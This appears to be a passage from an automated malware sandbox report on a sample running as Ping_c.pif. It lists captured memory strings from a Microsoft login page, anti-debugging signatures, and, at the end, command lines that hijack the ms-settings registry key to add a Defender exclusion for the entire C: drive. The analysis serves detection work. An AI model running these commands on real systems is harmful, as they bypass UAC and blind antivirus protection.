SameSite=None; HttpOnlyuaid=40715f9b847941fc820b3d4e993dec64; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateCP="DSP CUR OTPi IND OTRi ONL FIN"P3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 21 Sep 2024 14:22:12 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=utf-8Content-Type25986Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerno-cachePragmaKeep-AliveSat, 21 Sep 2024 14:23:12 GMTDateProxy-ConnectioncloseConnectionno-store, no-cacheCache-Control
        Source: Ping_c.pif, 0000001F.00000003.2012764000.0000000027228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~248!!!SL~Sierra Leone~232!!!SG~Singapore~65!!!XE~Sint Eustatius~599!!!SK~Slovakia~421!!!SI~Slovenia~386!!!SB~Solomon Islands~677!!!SO~Somalia~252!!!ZA~South Africa~27!!!SS~South Sudan~211!!!ES~Spain~34!!!LK~Sri Lanka~94!!!SH~St Helena, Ascension, and Tristan da Cunha~290!!!SD~Sudan~249!!!SR~Suriname~597!!!SJ~Svalbard~47!!!SZ~Swaziland~268!!!SE~Sweden~46!!!CH~Switzerland~41!!!SY~Syria~963!!!TW~Taiwan~886!!!TJ~Tajikistan~992!!!TZ~Tanzania~255!!!TH~Thailand~66!!!TL~Timor-Leste~670!!!TG~Togo~228!!!TK~Tokelau~690!!!TO~Tonga~676!!!TT~Trinidad and Tobago~1!!!TA~Tristan da Cunha~290!!!TN~Tunisia~216!!!TR~Turkey~90!!!TM~Turkmenistan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!UM~U.S. Outlying Islands~1!!!VI~U.S. Virgin Islands~1!!!UG~Uganda~256!!!UA~Ukraine~380!!!AE~United Arab Emirates~971!!!UK~United Kingdom~44!!!US~United States~1!!!UY~Uruguay~598!!!UZ~Uzbekistan~998!!!VU~Vanuatu~678!!!VA~Vatican City~379!!!VE~Venezuela~58!!!VN~Vietnam~84!!!WF~Wallis and Futuna~681!!!YE~Yemen~967!!!ZM~Zambia~260!!!ZW~Zimbabwe~263',fIsRemoteConnectSignup:false,fIsPopupUI:false,fIsRTLMarket:false,arrFedNames:[],fAllowSkypeNameLogin:true,clientEvents:{"appInsightsConfig":{"instrumentationKey":"69adc3c768bd4dc08c19416121249fcc-66f1668a-797b-4249-95e3-6c6651768c28-7293","webAnalyticsConfiguration":{"autoCapture":{"jsError":1,"click":0}}},"appId":"-","defaultEventName":"IDUX_MSAClientTelemetryEvent_WebWatson","autoPost":true,"autoPostDelay":1000,"flush":60000,"maxEvents":1,"minEvents":1,"pltDelay":500,"telemetryEnabled":true,"useOneDSEventApi":true,"serviceID":2},fHasBackgroundColor:false,fUseHighContrastDetectionMode:true,environment:'PROD',urlStaySignIn:'https://login.live.com/login.srf?id=250206&id=250206&contextid=319ABC075F082527&opid=21BBA881A27C97CC&mkt=EN-US&lc=1033&bk=1726928583&uaid=f8f700404dd64de990b5afe28ef7290a',fActivateKeyboardFocusOnApprovalNumber:true,fAutoCaptureClicks:false,fAutoCaptureJsErrors:false,fCheckProofForAliases:false,fAllowPhoneSignIn:true,fEnableCssAnimation:true,fApplyAsciiRegexOnInput:true,fEnableOneDSClientTelemetry:true,urlProfilePhoto:''};</script><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return l.$Config||l.ServerData||{}}function r(e,r){var t=l.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=l.$B;if(void 0===c)if(e)c=e.IE;else{var r=l.navigator.userAgent;c=r.indexOf("MSIE ")!==-1||r.indexOf("Trident/")!==-1}return c}function n(){var e=l.$B;if(void 0===f)if(e)f=e.RE_Edge;else{var r=l.navigator.userAgent;f=r.indexOf("Edge")!==-1}return f}function o(e){var r=e.indexOf("?"),t=r>-1?r:e.l
        Source: Ping_c.pif, 0000001F.00000003.2113083147.00000000271E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~15f9b847941fc820b3d4e993dec64; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlyMSPRequ=id=250206&lt=1726928592&co=1; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlyMSCC=8.46.123.33-US; expires=Thu, 16-Oct-2025 14:23:12 GMT; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlyMSPOK=$uuid-79f7c540-2344-4ca1-b180-b58fdf332a00; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlyOParams=11O.DmbE6iB7bsObsYNe1rkdqKpK5u71BKXaBxnzE*iqOdHncPifdWCtADVQbsse*dEOtiSePZb16T0Mp2hBZt*6G4nBRjJN0b3TqYcHpU7LBSn7g2cREEdPI5PXqS1yRdICCpcsyMYaYuuv1nD!A*d98!f4AWtQnlhL1Cx!5QX30DmM!NA74edz28VzEu5yfrBGmci29euBlEc8wyGeFnjjPA0!XThoCBFYdSytcZfxmKUfi*W3H9!rYQEvStLyOsa18mtxpSXodi3XjZa*hBDnv9Ke7mMFqeMua!CIP!U9E6ZngHeqNhzVHLviM0MpycrE0uiUtresalR6EptRKIlz2oTSPj3yB8u2e6IfL9XvqF7Kr0WB!5*0xMdd34WM1id5bg$$; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnly
        Source: Ping_c.pif, 0000001F.00000002.2703452505.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Ping_c.pif, 0000001F.00000003.2012981796.0000000027215000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: techange=function(){"loaded"===s.readyState?setTimeout(function(){h(e,o,a,s)},500):"complete"===s.readyState&&h(e,o,a,s)},t(s),r("[$Loader]: Loading '"+(i.srcPath||"")+"', id:"+(i.id||""))}else o&&o()}var p=e(),y=p.slMaxRetry||2,m=p.loader||{},x=m.cdnRoots||[],L=m.tenantBrandingCdnRoots||[],R=this,b=[];R.retryOnError=!0,R.successMessage="Loaded",R.failMessage="Error",R.Add=function(e,r,t,n,o,a){e&&b.push({srcPath:e,id:r,retry:n||0,integrity:t,tagName:o||"script",onSuccess:a})},R.AddForReload=function(e,r){var t=e.src||e.href||"";R.Add(t,"AddForReload",e.integrity,1,e.tagName,r)},R.AddIf=function(e,r,t){e&&R.Add(r,t)},R.Load=function(e,r){v(0,e,r)}}var c,f,l=window,g=l.document,h=".css";u.On=function(e,r,t){if(!e)throw"The target element must be provided and cannot be null.";r?u.OnError(e,t):u.OnSuccess(e,t)},u.OnSuccess=function(e,t){if(!e)throw"The target element must be provided and cannot be null.";if(d(e))return u.OnError(e,t);var n=e.src||e.href||"",o=a(),s=i();r("[$Loader]: Loaded",e);var c=new u;c.failMessage="Reload Failed",c.successMessage="Reload Success",c.Load(null,function(){if(o)throw"Unexpected state. ResourceLoader.Load() failed despite initial load success. ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")})},u.OnError=function(e,t){var n=e.src||e.href||"",o=a(),s=i();if(!e)throw"The target element must be provided and cannot be null.";r("[$Loader]: Failed",e);var d=new u;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.AddForReload(e,t),d.Load(null,function(){if(o)throw"Failed to load external resource ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")}),u._ReportFailure(0,n)},u._ReportFailure=function(e,r){if(s()&&!t())throw"[Retry "+e+"] Failed to load external resource ['"+r+"'], reloading from fallback CDN endpoint"},l.$Loader=u}()}]));</script><link rel="shortcut icon" href="https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico" /><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:none;}</style><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style>');}</script><noscript><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style></noscript><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var i=t[n]={exports:{},id:n,loaded:!1};return e[n].call(i.exports,i,i.exports,r),i.loaded=!0,i.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,i,s,a){var o=1,c=unescape("%3Cscript type='text/javascript'");a&&(c+="
        Source: Ping_c.pif, 0000001F.00000003.2020461089.0000000000798000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SRSSuccess+=e+"|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script></head><body><div id="root" /><script type="text/javascript" src="https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js" crossorigin="anonymous" class="handle-error-tag"/></script></body></html>VN~Vietnam~84!!!WF~Wallis and Futuna~681!!!YE~Yemen~967!!!ZM~Zambia~260!!!ZW~Zimbabwe~263',fIsRemoteConnectSignup:false,fIsPopupUI:false,fIsRTLMarket:false,arrFedNames:[],fAllowSkypeNameLogin:true,clientEvents:{"appInsightsConfig":{"instrumentationKey":"69adc3c768bd4dc08c19416121249fcc-66f1668a-797b-4249-95e3-6c6651768c28-7293","webAnalyticsConfiguration":{"autoCapture":{"jsError":1,"click":0}}},"appId":"-","defaultEventName":"IDUX_MSAClientTelemetryEvent_WebWatson","autoPost":true,"autoPostDelay":1000,"flush":60000,"maxEvents":1,"minEvents":1,"pltDelay":500,"telemetryEnabled":true,"useOneDSEventApi":true,"serviceID":2},fHasBackgroundColor:false,fUseHighContrastDetectionMode:true,environment:'PROD',urlStaySignIn:'https://login.live.com/login.srf?id=250206&id=250206&contextid=319ABC075F082527&opid=21BBA881A27C97CC&mkt=EN-US&lc=1033&bk=1726928583&uaid=f8f700404dd64de990b5afe28ef7290a',fActivateKeyboardFocusOnApprovalNumber:true,fAutoCaptureClicks:false,fAutoCaptureJsErrors:false,fCheckProofForAliases:false,fAllowPhoneSignIn:true,fEnableCssAnimation:true,fApplyAsciiRegexOnInput:true,fEnableOneDSClientTelemetry:true,urlProfilePhoto:''};</script><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return l.$Config||l.ServerData||{}}function r(e,r){var t=l.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=l.$B;if(void 0===c)if(e)c=e.IE;else{var r=l.navigator.userAgent;c=r.indexOf("MSIE ")!==-1||r.indexOf("Trident/")!==-1}return c}function n(){var e=l.$B;if(void 0===f)if(e)f=e.RE_Edge;else{var r=l.navigator.userAgent;f=r.indexOf("Edge")!==-1}return f}function o(e){var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t),o=e.substring(n,n+h.length).toLowerCase()===h;return o}function a(){var r=e(),t=r.loader||{};return t.slReportFailure||r.slReportFailure||!1}function i(){var r=e(),t=r.loader||{};return t.redirectToErrorPageOnLoadFailure||!1}function s(){var r=e(),t=r.loader||{};return t.logByThrowing||!1}function d(e){if(!t()&&!n())return!1;var r=e.src||e.href||"";if(!r)return!0;if(o(r)){var a,i,s;try{a=e.sheet,i=a&&a.cssRules,s=!1}catch(d){s=!0}if(a&&!i&&s)return!0;if(a&&i&&0===i.length)return!0}return!1}function u(){function t(e){var r=g.getElementsByTagName("head")[0];r.appendChild(e)}function n(e,r,t,n){var d
        Source: Ping_c.pif, 0000001F.00000003.2019909458.000000002721B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indow,g=l.document,h=".css";u.On=function(e,r,t){if(!e)throw"The target element must be provided and cannot be null.";r?u.OnError(e,t):u.OnSuccess(e,t)},u.OnSuccess=function(e,t){if(!e)throw"The target element must be provided and cannot be null.";if(d(e))return u.OnError(e,t);var n=e.src||e.href||"",o=a(),s=i();r("[$Loader]: Loaded",e);var c=new u;c.failMessage="Reload Failed",c.successMessage="Reload Success",c.Load(null,function(){if(o)throw"Unexpected state. ResourceLoader.Load() failed despite initial load success. ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")})},u.OnError=function(e,t){var n=e.src||e.href||"",o=a(),s=i();if(!e)throw"The target element must be provided and cannot be null.";r("[$Loader]: Failed",e);var d=new u;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.AddForReload(e,t),d.Load(null,function(){if(o)throw"Failed to load external resource ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")}),u._ReportFailure(0,n)},u._ReportFailure=function(e,r){if(s()&&!t())throw"[Retry "+e+"] Failed to load external resource ['"+r+"'], reloading from fallback CDN endpoint"},l.$Loader=u}()}]));</script><link rel="shortcut icon" href="https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico" /><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:none;}</style><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style>');}</script><noscript><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style></noscript><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var i=t[n]={exports:{},id:n,loaded:!1};return e[n].call(i.exports,i,i.exports,r),i.loaded=!0,i.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,i,s,a){var o=1,c=unescape("%3Cscript type='text/javascript'");a&&(c+=" crossorigin='anonymous' integrity='"+a+"'"),c+=" src='";var u=unescape("'%3E%3C/script%3E"),S=r;if(n&&n.userAgent&&s&&s!==r){var d=n.userAgent.toLowerCase(),p=d.indexOf("edge")>=0;if(!p){var f=d.match(/chrome\/([0-9]+)\./),g=f&&2===f.length&&!isNaN(f[1])&&parseInt(f[1])>54;g&&(S=s)}}t.g_sSRSSuccess.indexOf(e)===-1&&("undefined"==typeof t[e]?(t.g_iSRSFailed=1,i<=o&&document.write(c+S+u)):t.g_sSRSSuccess+=e+"|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script></head><body><div id="root" /><script type="text/javascript" src="https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js" crossorigin="anonymous" class="ha
        Source: Ping_c.pif, 0000001F.00000003.2112272992.00000000007E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Set-Cookie: OParams=11O.DmbE6iB7bsObsYNe1rkdqKpK5u71BKXaBxnzE*iqOdHncPifdWCtADVQbsse*dEOtiSePZb16T0Mp2hBZt*6G4nBRjJN0b3TqYcHpU7LBSn7g2cREEdPI5PXqS1yRdICCpcsyMYaYuuv1nD!A*d98!f4AWtQnlhL1Cx!5QX30DmM!NA74edz28VzEu5yfrBGmci29euBlEc8wyGeFnjjPA0!XThoCBFYdSytcZfxmKUfi*W3H9!rYQEvStLyOsa18mtxpSXodi3XjZa*hBDnv9Ke7mMFqeMua!CIP!U9E6ZngHeqNhzVHLviM0MpycrE0uiUtresalR6EptRKIlz2oTSPj3yB8u2e6IfL9XvqF7Kr0WB!5*0xMdd34WM1id5bg$$; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnly
        Source: Ping_c.pif, 0000001F.00000002.2703452505.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPay%SystemRoot%\system32\mswsock.dll)
        Source: Ping_c.pif, 0000001F.00000003.2012764000.0000000027235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stan~993!!!TC~Turks and Caicos Islands~1!!!TV~Tuvalu~688!!!UM~U.S. Outlying Islands~1!!!VI~U.S. Virgin Islands~1!!!UG~Uganda~256!!!UA~Ukraine~380!!!AE~United Arab Emirates~971!!!UK~United Kingdom~44!!!US~United States~1!!!UY~Uruguay~598!!!UZ~Uzbekistan~998!!!VU~Vanuatu~678!!!VA~Vatican City~379!!!VE~Venezuela~58!!!VN~Vietnam~84!!!WF~Wallis and Futuna~681!!!YE~Yemen~967!!!ZM~Zambia~260!!!ZW~Zimbabwe~263',fIsRemoteConnectSignup:false,fIsPopupUI:false,fIsRTLMarket:false,arrFedNames:[],fAllowSkypeNameLogin:true,clientEvents:{"appInsightsConfig":{"instrumentationKey":"69adc3c768bd4dc08c19416121249fcc-66f1668a-797b-4249-95e3-6c6651768c28-7293","webAnalyticsConfiguration":{"autoCapture":{"jsError":1,"click":0}}},"appId":"-","defaultEventName":"IDUX_MSAClientTelemetryEvent_WebWatson","autoPost":true,"autoPostDelay":1000,"flush":60000,"maxEvents":1,"minEvents":1,"pltDelay":500,"telemetryEnabled":true,"useOneDSEventApi":true,"serviceID":2},fHasBackgroundColor:false,fUseHighContrastDetectionMode:true,environment:'PROD',urlStaySignIn:'https://login.live.com/login.srf?id=250206&id=250206&contextid=319ABC075F082527&opid=21BBA881A27C97CC&mkt=EN-US&lc=1033&bk=1726928583&uaid=f8f700404dd64de990b5afe28ef7290a',fActivateKeyboardFocusOnApprovalNumber:true,fAutoCaptureClicks:false,fAutoCaptureJsErrors:false,fCheckProofForAliases:false,fAllowPhoneSignIn:true,fEnableCssAnimation:true,fApplyAsciiRegexOnInput:true,fEnableOneDSClientTelemetry:true,urlProfilePhoto:''};</script><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return l.$Config||l.ServerData||{}}function r(e,r){var t=l.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appen
        Source: Ping_c.pif, 0000001F.00000003.2012764000.0000000027238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Loader]: Failed",e);var d=new u;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.AddForReload(e,t),d.Load(null,function(){if(o)throw"Failed to load external resource ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")}),u._ReportFailure(0,n)},u._ReportFailure=function(e,r){if(s()&&!t())throw"[Retry "+e+"] Failed to load external resource ['"+r+"'], reloading from fallback CDN endpoint"},l.$Loader=u}()}]));</script><link rel="shortcut icon" href="https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico" /><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:none;}</style><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style>');}</script><noscript><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style></noscript><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var i=t[n]={exports:{},id:n,loaded:!1};return e[n].call(i.exports,i,i.exports,r),i.loaded=!0,i.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,i,s,a){var o=1,c=unescape("%3Cscript type='text/javascript'");a&&(c+=" crossorigin='anonymous' integrity='"+a+"'"),c+=" src='";var u=unescape("'%3E%3C/script%3E"),S=r;if(n&&n.userAgent&&s&&s!==r){var d=n.userAgent.toLowerCase(),p=d.indexOf("edge")>=0;if(!p){var f=d.match(/chrome\/([0-9]+)\./),g=f&&2===f.length&&!isNaN(f[1])&&parseInt(f[1])>54;g&&(S=s)}}t.g_sSRSSuccess.indexOf(e)===-1&&("undefined"==typeof t[e]?(t.g_iSRSFailed=1,i<=o&&document.write(c+S+u)):t.g_sSRSSuccess+=e+"|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script></head><body><div id="root" /><script type="text/javascript" src="https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js" crossorigin="anonymous" class="handle-error-tag"/></script></body></html>
        Source: Ping_c.pif, 0000001F.00000003.2048630262.0000000027215000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <base href="https://login.live.com"/><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">try{document&&document.addEventListener&&(document.addEventListener("load",(function(e){e.target&&"handle-error-tag"===e.target.className&&$Loader.On(e.target)}),!0),document.addEventListener("error",(function(e){e.target&&"handle-error-tag"===e.target.className&&$Loader.On(e.target,!0)}),!0))}catch(e){}</script><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, SecurityKey: 18, Voice: -3};</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=f8f700404dd@)
        Source: C:\Users\Public\Libraries\Ping_c.pifAPI call chain: ExitProcess graph end node
        Source: C:\Users\Public\xkn.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295D5D0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,31_2_0295D5D0
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess queried: DebugPort
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess queried: DebugPort
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess queried: DebugFlags
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F263FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF744F263FC
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,19_2_00007FF73A39A29C
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_02957CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,31_2_02957CA8
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029873AD mov eax, dword ptr fs:[00000030h]31_2_029873AD
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F14D5C InitializeCriticalSection,SetConsoleCtrlHandler,_get_osfhandle,GetConsoleMode,_get_osfhandle,GetConsoleMode,GetCommandLineW,GetCommandLineW,GetWindowsDirectoryW,GetConsoleOutputCP,GetCPInfo,GetProcessHeap,HeapAlloc,GetConsoleTitleW,GetStdHandle,GetConsoleScreenBufferInfo,GlobalFree,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,free,4_2_00007FF744F14D5C
        Source: C:\Users\Public\xkn.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F193B0 SetUnhandledExceptionFilter,4_2_00007FF744F193B0
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F193B0 SetUnhandledExceptionFilter,5_2_00007FF744F193B0
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F193B0 SetUnhandledExceptionFilter,8_2_00007FF744F193B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608064E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF608064E18
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080653E0 SetUnhandledExceptionFilter,9_2_00007FF6080653E0
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF73A39ED50
        Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF73A39F050 SetUnhandledExceptionFilter,19_2_00007FF73A39F050
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D289F0 SetUnhandledExceptionFilter,22_2_00007FF739D289F0
        Source: C:\Windows \System32\per.exeCode function: 22_2_00007FF739D28CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF739D28CCC
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F193B0 SetUnhandledExceptionFilter,35_2_00007FF744F193B0
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F18FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,38_2_00007FF744F18FA4
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F193B0 SetUnhandledExceptionFilter,38_2_00007FF744F193B0
        Source: C:\Users\Public\xkn.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Adds a directory exclusion to Windows Defender
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
